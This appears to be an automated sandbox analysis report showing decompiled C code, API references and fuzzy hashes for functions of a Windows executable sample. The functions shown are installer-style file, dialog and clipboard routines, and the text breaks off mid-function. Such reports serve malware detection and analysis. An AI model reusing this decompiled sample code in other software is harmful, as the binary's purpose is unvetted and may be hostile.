                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$AttributesCreate
                                                                                                        • String ID:
                                                                                                        • API String ID: 415043291-0
                                                                                                        • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                                        • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                                                                                                        • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                                        • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004035BD, Relevance: 2.5, APIs: 2, Instructions: 20COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004035BD() {
				void* _t1;
				void* _t2;
				void* _t7;
				signed int _t12;

				_t1 =  *0x409014; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409014 =  *0x409014 | 0xffffffff;
				}
				_t2 =  *0x409018; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x409018 =  *0x409018 | 0xffffffff;
					_t12 =  *0x409018;
				}
				E0040361A();
				return E0040548B(_t7, _t12, 0x42a800, 7);
			}







                                                                                                        0x004035bd
                                                                                                        0x004035cc
                                                                                                        0x004035cf
                                                                                                        0x004035d1
                                                                                                        0x004035d1
                                                                                                        0x004035d8
                                                                                                        0x004035e0
                                                                                                        0x004035e3
                                                                                                        0x004035e5
                                                                                                        0x004035e5
                                                                                                        0x004035e5
                                                                                                        0x004035ec
                                                                                                        0x004035fe

                                                                                                        APIs
                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,0040342D,00000000), ref: 004035CF
                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,0040342D,00000000), ref: 004035E3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2962429428-0
                                                                                                        • Opcode ID: d5091cb339cf9ca4b2a17f3525511bedeea9812c5bf65782ecb3b679df28d270
                                                                                                        • Instruction ID: 5c77e6c533590f6c422f1e12d180fd4ee44bb6ddfd602f374d0031013ab669df
                                                                                                        • Opcode Fuzzy Hash: d5091cb339cf9ca4b2a17f3525511bedeea9812c5bf65782ecb3b679df28d270
                                                                                                        • Instruction Fuzzy Hash: 3AE08C30900610AAC234AF7CAE4594A3A1C9B413327248722F538F21F2C738AE824AAD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004031BF, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004031BF(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                        0x004031c3
                                                                                                        0x004031d6
                                                                                                        0x004031de
                                                                                                        0x00000000
                                                                                                        0x004031e5
                                                                                                        0x00000000
                                                                                                        0x004031e7

                                                                                                        APIs
                                                                                                        • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00413040,0040B040,004030C4,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000), ref: 004031D6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                        • Instruction ID: 4c5c04567c480c11bae84e94003d2882b37cb3083c3cc1db03504fe221b835f3
                                                                                                        • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                        • Instruction Fuzzy Hash: DAE08631500119BBCF215E619C00A973B5CEB09362F008033FA04E9190D532DB109BA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004031F1, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004031F1(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                        0x004031ff
                                                                                                        0x00403205

                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FilePointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 973152223-0
                                                                                                        • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                        • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                                                                                        • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                        • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 00405042, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 95%
                                                                                                        			E00405042(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				void* _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t122;
				struct HWND__* _t126;
				int _t148;
				int _t149;
				struct HWND__* _t153;
				struct HWND__* _t157;
				struct HMENU__* _t159;
				long _t161;
				void* _t162;
				short* _t163;

				_t153 =  *0x423684;
				_t148 = 0;
				_v8 = _t153;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404FD6, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t153) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t153, 0x1004, _t148, _t148);
								_a8 = _t87;
								if(_t87 <= _t148) {
									L37:
									return 0;
								}
								_t159 = CreatePopupMenu();
								AppendMenuA(_t159, _t148, 1, E00405B88(_t148, _t153, _t159, _t148, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t149 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t153,  &_v28);
									_t149 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t159, 0x180, _t149, _t94, _t148, _a4, _t148);
								_t161 = 1;
								if(_t95 == 1) {
									_v60 = _t148;
									_v48 = 0x4204a0;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t148);
									OpenClipboard(_t148);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t161);
									_a4 = _t101;
									GlobalFix(_t101);
									_t162 = _t101;
									do {
										_v48 = _t162;
										_t163 = _t162 + SendMessageA(_v8, 0x102d, _t148,  &_v68);
										 *_t163 = 0xa0d;
										_t162 = _t163 + 2;
										_t148 = _t148 + 1;
									} while (_t148 < _a8);
									GlobalUnWire(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t148) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t148) {
								E00404F04( *((intOrPtr*)( *0x41fc70 + 0x34)), _t148);
							}
							E00403EF1(1);
							goto L25;
						}
						 *0x41f868 = 2;
						E00403EF1(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403F7F(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t148);
						ShowWindow(_t153, 8);
						E00403F4D(_t153);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t122 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t122 + 0x5c));
				_a12 =  *((intOrPtr*)(_t122 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t126 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t126;
				_v8 = _t126;
				E00403F4D( *0x423670);
				 *0x423674 = E004047A6(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t148) {
					SendMessageA(_v8, 0x1024, _t148, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403F18(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t148);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t148;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F4D( *0x423668);
				}
				_t157 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t157, 0x401, _t148, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t157, 0x409, _t148, _a12);
					SendMessageA(_t157, 0x2001, _t148, _a8);
				}
				goto L37;
			}
































                                                                                                        0x0040504b
                                                                                                        0x00405051
                                                                                                        0x0040505a
                                                                                                        0x0040505d
                                                                                                        0x004051f5
                                                                                                        0x00405219
                                                                                                        0x00405219
                                                                                                        0x0040522c
                                                                                                        0x0040524a
                                                                                                        0x00405251
                                                                                                        0x004052a8
                                                                                                        0x004052ac
                                                                                                        0x00000000
                                                                                                        0x004052b3
                                                                                                        0x004052bb
                                                                                                        0x004052c3
                                                                                                        0x004052c6
                                                                                                        0x004053bf
                                                                                                        0x00000000
                                                                                                        0x004053bf
                                                                                                        0x004052d5
                                                                                                        0x004052e1
                                                                                                        0x004052e7
                                                                                                        0x004052ed
                                                                                                        0x00405302
                                                                                                        0x00405308
                                                                                                        0x004052ef
                                                                                                        0x004052f4
                                                                                                        0x004052fa
                                                                                                        0x004052fd
                                                                                                        0x004052fd
                                                                                                        0x00405318
                                                                                                        0x00405320
                                                                                                        0x00405323
                                                                                                        0x0040532c
                                                                                                        0x0040532f
                                                                                                        0x00405336
                                                                                                        0x0040533d
                                                                                                        0x00405345
                                                                                                        0x00405345
                                                                                                        0x0040535c
                                                                                                        0x0040535c
                                                                                                        0x00405363
                                                                                                        0x00405369
                                                                                                        0x00405372
                                                                                                        0x00405379
                                                                                                        0x0040537c
                                                                                                        0x00405382
                                                                                                        0x00405384
                                                                                                        0x00405387
                                                                                                        0x00405396
                                                                                                        0x00405398
                                                                                                        0x0040539e
                                                                                                        0x0040539f
                                                                                                        0x004053a0
                                                                                                        0x004053a8
                                                                                                        0x004053b3
                                                                                                        0x004053b9
                                                                                                        0x004053b9
                                                                                                        0x00000000
                                                                                                        0x00405323
                                                                                                        0x004052ac
                                                                                                        0x00405259
                                                                                                        0x00405289
                                                                                                        0x00405291
                                                                                                        0x0040529c
                                                                                                        0x0040529c
                                                                                                        0x004052a3
                                                                                                        0x00000000
                                                                                                        0x004052a3
                                                                                                        0x0040525d
                                                                                                        0x00405267
                                                                                                        0x00000000
                                                                                                        0x0040522e
                                                                                                        0x00405234
                                                                                                        0x0040526c
                                                                                                        0x00000000
                                                                                                        0x00405275
                                                                                                        0x0040523d
                                                                                                        0x00405242
                                                                                                        0x00405245
                                                                                                        0x00000000
                                                                                                        0x00405245
                                                                                                        0x0040522c
                                                                                                        0x00405063
                                                                                                        0x00405067
                                                                                                        0x00405070
                                                                                                        0x00405077
                                                                                                        0x0040507a
                                                                                                        0x0040507d
                                                                                                        0x00405080
                                                                                                        0x00405081
                                                                                                        0x00405082
                                                                                                        0x0040509b
                                                                                                        0x0040509e
                                                                                                        0x004050a8
                                                                                                        0x004050b7
                                                                                                        0x004050bf
                                                                                                        0x004050c7
                                                                                                        0x004050cc
                                                                                                        0x004050cf
                                                                                                        0x004050db
                                                                                                        0x004050e4
                                                                                                        0x004050ed
                                                                                                        0x00405110
                                                                                                        0x00405116
                                                                                                        0x00405127
                                                                                                        0x0040512c
                                                                                                        0x0040513a
                                                                                                        0x00405148
                                                                                                        0x00405148
                                                                                                        0x0040514d
                                                                                                        0x0040515b
                                                                                                        0x0040515b
                                                                                                        0x00405160
                                                                                                        0x00405163
                                                                                                        0x00405168
                                                                                                        0x00405174
                                                                                                        0x0040517d
                                                                                                        0x0040518a
                                                                                                        0x00405199
                                                                                                        0x0040518c
                                                                                                        0x00405191
                                                                                                        0x00405191
                                                                                                        0x004051a5
                                                                                                        0x004051a5
                                                                                                        0x004051b9
                                                                                                        0x004051c2
                                                                                                        0x004051cb
                                                                                                        0x004051db
                                                                                                        0x004051e7
                                                                                                        0x004051e7
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32 ref: 004050A1
                                                                                                        • GetDlgItem.USER32 ref: 004050B0
                                                                                                        • GetClientRect.USER32 ref: 004050ED
                                                                                                        • GetSystemMetrics.USER32 ref: 004050F5
                                                                                                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405116
                                                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405127
                                                                                                        • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040513A
                                                                                                        • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405148
                                                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040515B
                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040517D
                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405191
                                                                                                        • GetDlgItem.USER32 ref: 004051B2
                                                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051C2
                                                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051DB
                                                                                                        • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004051E7
                                                                                                        • GetDlgItem.USER32 ref: 004050BF
                                                                                                          • Part of subcall function 00403F4D: SendMessageA.USER32(00000028,?,00000001,00403D7E), ref: 00403F5B
                                                                                                        • GetDlgItem.USER32 ref: 00405204
                                                                                                        • CreateThread.KERNEL32 ref: 00405212
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405219
                                                                                                        • ShowWindow.USER32(00000000), ref: 0040523D
                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405242
                                                                                                        • ShowWindow.USER32(00000008), ref: 00405289
                                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052BB
                                                                                                        • CreatePopupMenu.USER32 ref: 004052CC
                                                                                                        • AppendMenuA.USER32 ref: 004052E1
                                                                                                        • GetWindowRect.USER32 ref: 004052F4
                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405318
                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405353
                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405363
                                                                                                        • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405369
                                                                                                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405372
                                                                                                        • GlobalFix.KERNEL32(00000000), ref: 0040537C
                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405390
                                                                                                        • GlobalUnWire.KERNEL32(00000000), ref: 004053A8
                                                                                                        • SetClipboardData.USER32 ref: 004053B3
                                                                                                        • CloseClipboard.USER32 ref: 004053B9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleMetricsOpenSystemThreadTrackWire
                                                                                                        • String ID: {
                                                                                                        • API String ID: 1854847162-366298937
                                                                                                        • Opcode ID: 15bcaaf7b9c2500fdfc7a15f58e923324fe2155ddd01929f033f26ccd8a03658
                                                                                                        • Instruction ID: b28aa7ce0402c6385ba5b6cd868a6258f1d07b471923b7bae974b2a68da01879
                                                                                                        • Opcode Fuzzy Hash: 15bcaaf7b9c2500fdfc7a15f58e923324fe2155ddd01929f033f26ccd8a03658
                                                                                                        • Instruction Fuzzy Hash: 34A14870904208FFDB219F60DD89AAE7F79FB08355F00417AFA05BA2A0C7795A41DF69
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404853, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E00404853(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				long _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				long _t251;
				long _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				intOrPtr _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 =  *0x407244;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004047D3(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42047c;
								if(_t220 != _t315) {
									 *0x40702c(_t220);
								}
								_t221 =  *0x420494;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42047c = _t315;
								 *0x420494 = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420494;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E004046F1(0x3ff, 0xfffffffb, E004047A6(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420494);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420494 = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420488 =  *0x420488 | 0xffffffff;
					_v24 = _t250;
					_t251 = SetWindowLongA(_v8, 0xfffffffc, E00404E54);
					 *0x420490 = _t251;
					_t252 =  *0x407034(0x10, 0x10, 0x21, 6, 0);
					 *0x42047c = _t252;
					 *0x407028(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42047c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B88(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403F18(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403F18(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
